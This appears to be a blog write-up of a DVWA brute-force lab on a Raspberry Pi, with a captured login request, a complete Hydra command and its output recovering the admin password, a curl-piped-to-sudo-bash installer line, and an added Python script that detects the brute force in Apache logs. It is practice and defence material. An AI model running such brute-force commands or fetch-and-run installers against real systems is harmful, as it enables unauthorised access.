2024-12-12 DVWA challenge 1
===========================

.. post:: Feb 12, 2024
   :category: Hacking, Networks
   :tags: networks, network security, bruteforcing, web security, webapp pentesting
   :author: ccli
   :language: en

I finally decided that today would be the day I put my RPi to actual use. I decided on hosting DVWA (Damn Vulnerable Web Application) on it to practice some basic web-app pentesting techniques; here's how it went.

Setup
-----

The initial setup of DVWA was fairly typical for any Linux application, but I had a few painful areas to get through. Originally I decided to clone the DVWA repository to my host machine and copy the files over:

.. code-block:: bash

   scp -r /home/j/DVWA j@10.x.x.x:/home/j/DVWA

Then I ran the following command to (hopefully) download any dependencies:

.. code-block:: bash

   sudo apt update

This instantly failed; after about 30 minutes of debugging I found that adding the US APT mirror fixed the issue. Anyway, back on topic.

I attempted to start Apache but ran into quite a few configuration and PATH issues. Every time I fixed one error another would seemingly appear out of nowhere; at this point I decided that my current setup was beyond repair, so I ``rm -rf``'d any Apache-related directories, hoping a fresh install would help. With my system clean of any previous bugs, I decided that the best way to get this working would be to SSH into my RPi and run the setup one-liner they posted on their GitHub:

.. code-block:: bash

   sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)"

This script handled all of the installation perfectly, and by running:

.. code-block:: bash

   sudo apache2

along with some extra MySQL configuration, I successfully started DVWA on my RPi and can now access it from my main computer. Now that I am able to navigate to ``10.x.x.x.x:xxxx/DVWA`` I can start testing the site.
Challenge 1: Brute force
------------------------

Note: This challenge was done on "easy" mode.

Credits: I used `This article `_ as a general guide.

The first thing I did for this challenge was open Burp Suite. I wanted to see what requests were being made when I attempted a login; any form of recon like this is essential to create a mind map of a system. Here is my first test.

I started by running the Burp Suite browser proxy and attempted a login with ``j:j``. I copied the request and its response to get a better idea of what's happening under the hood:

.. code-block:: bash

   curl --path-as-is -i -s -k -X $'GET' \
       -H $'Host: 10.0.0.100:8898' -H $'Accept-Language: en-US,en;q=0.9' \
       -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36' \
       -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
       -H $'Referer: http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=&password=&Login=Login' \
       -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
       -b $'PHPSESSID=6uegn0i91ebjsi55eenm6kkgel; security=low' \
       $'http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=j&password=j&Login=Login'

.. code-block:: http

   HTTP/1.1 200 OK
   Date: Fri, 13 Dec 2024 00:31:38 GMT
   Server: Apache/2.4.59 (Raspbian)
   Expires: Tue, 23 Jun 2009 12:00:00 GMT
   Cache-Control: no-cache, must-revalidate
   Pragma: no-cache
   Vary: Accept-Encoding
   Content-Encoding: gzip
   Content-Length: 1406
   Keep-Alive: timeout=5, max=100
   Connection: Keep-Alive
   Content-Type: text/html;charset=utf-8

Breaking this down, we can see that when we attempt to log in, the browser sends an HTTP GET request to my DVWA server passing the username and password as URL parameters; in this case you can see my username, ``username=j``, and my password, ``password=j``. With this knowledge we can try to perform a brute force by modifying these URL parameters.
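The same exchange seen from the server side, as an added example that is not code from this post or from DVWA: a Python script that parses Apache access-log lines, flags a client that makes many login attempts against the form endpoint within a short window, and singles out the one response whose size differs from the rest (the defender's counterpart to the failure string a tool like Hydra keys on, since each failed page is the same size). The log lines are constructed inline to mirror the wordlist run shown later on this page; the window, threshold and response sizes are assumptions. Because the form submits credentials via GET, the password also lands verbatim in the access log, in ``Referer`` headers and in browser history, which is one reason login forms should POST.

```python
"""Server-side detection of a GET-form login brute force from Apache access logs.
Added example, not code from the original post or from DVWA; the log lines are
constructed to mimic the Hydra run on this page."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, quote, urlsplit

# Prefix of the Apache combined log format (referer/user-agent may follow).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
LOGIN_PATH = "/DVWA/vulnerabilities/brute/"  # the endpoint exercised on the page
WINDOW = timedelta(seconds=10)               # assumed tuning values
THRESHOLD = 10

# Wordlist exactly as it appears in the Hydra output on this page.
PASSWORDS = ["", "admin", "123456", "root", "toor", "guest", "user", "welcome",
             "qwerty", "letmein", "monkey", "admin123", "letmein123",
             "password123", "admin1234", "secret", "test123", "passw0rd",
             "summer", "football", "password1234", "password"]


def constructed_log():
    """Constructed sample: one benign hit, then 22 attempts from one client at
    roughly Hydra's pace. Failed logins return 1406 bytes (the Content-Length
    in the captured response); the assumed successful one returns a different size."""
    base = datetime(2024, 12, 13, 0, 31, 38, tzinfo=timezone.utc)
    lines = ['10.0.0.7 - - [13/Dec/2024:00:31:30 +0000] '
             '"GET /DVWA/index.php HTTP/1.1" 200 2210']
    for i, pw in enumerate(PASSWORDS):
        ts = (base + timedelta(seconds=i // 6)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        size = 1450 if pw == "password" else 1406
        lines.append(f'10.0.0.50 - - [{ts}] "GET {LOGIN_PATH}?username=admin'
                     f'&password={quote(pw)}&Login=Login HTTP/1.1" 200 {size}')
    return lines


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["path"])
    qs = parse_qs(url.query, keep_blank_values=True)  # keep an empty "password="
    return {"ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "path": url.path,
            "user": qs.get("username", [None])[0],
            "password": qs.get("password", [None])[0],
            "status": int(m["status"]),
            "size": 0 if m["size"] == "-" else int(m["size"])}


def login_attempts(lines):
    """Only requests that carry a username to the login endpoint."""
    recs = (parse_line(line) for line in lines)
    return [r for r in recs if r and r["path"] == LOGIN_PATH and r["user"] is not None]


def find_bursts(attempts, window=WINDOW, threshold=THRESHOLD):
    """Sliding window per client IP. Returns {ip: {...}} for every client that
    made at least `threshold` attempts inside any `window`-long interval."""
    by_ip = defaultdict(list)
    for a in sorted(attempts, key=lambda a: a["ts"]):
        by_ip[a["ip"]].append(a)
    alerts = {}
    for ip, recs in by_ip.items():
        start, peak = 0, 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = {"max_in_window": peak,
                          "distinct_passwords": len({r["password"] for r in recs})}
    return alerts


def size_outliers(attempts):
    """Within one client's attempts, responses whose size deviates from the
    dominant (failure) size are the ones to investigate first."""
    by_ip = defaultdict(list)
    for a in attempts:
        by_ip[a["ip"]].append(a)
    out = []
    for recs in by_ip.values():
        common = Counter(r["size"] for r in recs).most_common(1)[0][0]
        out.extend(r for r in recs if r["size"] != common)
    return out


if __name__ == "__main__":
    attempts = login_attempts(constructed_log())
    print(find_bursts(attempts))
    for r in size_outliers(attempts):
        print("investigate:", r["ip"], r["ts"].isoformat(), "user", r["user"])
```

On the constructed log this reports one client with 22 attempts inside a ten-second window and 22 distinct passwords, and a single size outlier, the attempt to escalate. Against a real Apache log the same functions work unchanged; only ``LOGIN_PATH``, ``WINDOW`` and ``THRESHOLD`` need adjusting, and for a form that POSTs, the username would have to come from the application's own log rather than the query string.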
For this, I will use `THC Hydra `_. After a few hours of suffering (at least I can say I have experience with Hydra now...) I finally managed to successfully brute force the password; here was the final command:

.. code-block:: bash

   hydra -l admin -P ~/Documents/tools/lists/DVWA-PW-1.txt http-get-form:"//10.x.x.x:xxxx/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie:security=low;PHPSESSID=7jnr60dnenvsmqabg1fcemm14h:Username and/or password incorrect" -V

To break this down:

+-----------------------------------+--------------------------------------------------+
| Command                           | Explanation                                      |
+===================================+==================================================+
| -l admin                          | Set username to "admin"                          |
+-----------------------------------+--------------------------------------------------+
| -P .../lists/DVWA-PW-1.txt        | Set the password to this list's contents         |
+-----------------------------------+--------------------------------------------------+
| http-get-form ...                 | Target HTTP GET form                             |
+-----------------------------------+--------------------------------------------------+
| username=^USER^&password=^PASS^   | Set the username and passwords to previously     |
|                                   | assigned values (or files)                       |
+-----------------------------------+--------------------------------------------------+
| Cookie:security=low               | Cookie security option                           |
+-----------------------------------+--------------------------------------------------+
| PHPSESSID                         | Session ID (to skip authentication)              |
+-----------------------------------+--------------------------------------------------+
| -V                                | Verbose                                          |
+-----------------------------------+--------------------------------------------------+

And its output:

.. code-block:: text

   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "" - 1 of 22 [child 0] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin" - 2 of 22 [child 1] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "123456" - 3 of 22 [child 2] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "root" - 4 of 22 [child 3] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "toor" - 5 of 22 [child 4] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "guest" - 6 of 22 [child 5] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "user" - 7 of 22 [child 6] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "welcome" - 8 of 22 [child 7] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "qwerty" - 9 of 22 [child 8] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein" - 10 of 22 [child 9] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "monkey" - 11 of 22 [child 10] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin123" - 12 of 22 [child 11] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein123" - 13 of 22 [child 12] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "password123" - 14 of 22 [child 13] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin1234" - 15 of 22 [child 14] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "secret" - 16 of 22 [child 15] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "test123" - 17 of 22 [child 0] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "passw0rd" - 18 of 22 [child 1] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "summer" - 19 of 22 [child 2] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "football" - 20 of 22 [child 3] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "password1234" - 21 of 22 [child 10] (0/0)
   [ATTEMPT] target 10.0.0.100 - login "admin" - pass "password" - 22 of 22 [child 5] (0/0)
   [8898][http-get-form] host: 10.0.0.100   login: admin   password: password
   1 of 1 target successfully completed, 1 valid password found

Conclusion
----------

Although the setup and debugging were pretty frustrating, I really enjoyed this lab once it was complete, since I've had minimal experience with both brute-forcing and cookie manipulation.